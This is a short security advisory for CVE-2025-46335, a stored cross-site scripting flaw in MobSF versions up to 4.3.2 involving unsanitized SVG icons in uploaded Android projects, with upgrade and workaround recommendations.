CVE-2025-46335

Name of the Vulnerable Software and Affected Versions Mobile Security Framework (MobSF) versions up to and including 4.3.2

Description A Stored Cross-Site Scripting (XSS) issue has been identified in MobSF. The issue arises from improper sanitization of user-supplied SVG files during the Android APK analysis workflow. When an Android Studio project contains a malicious SVG file as an app icon and the project is zipped and uploaded to MobSF, the tool processes and extracts the contents without validating or sanitizing the SVG. The SVG file becomes publicly accessible via the web interface, and if it contains embedded JavaScript, accessing the URL via a browser leads to the execution of the script in the context of the MobSF user session, resulting in stored XSS.

Recommendations For versions up to and including 4.3.2, update to version 4.3.3 to fix the issue. As a temporary workaround, consider restricting access to the download endpoint, specifically to files with the .svg extension, to minimize the risk of exploitation. Avoid using the http://127.0.0.1:8081/download/filename.svg endpoint until the issue is resolved.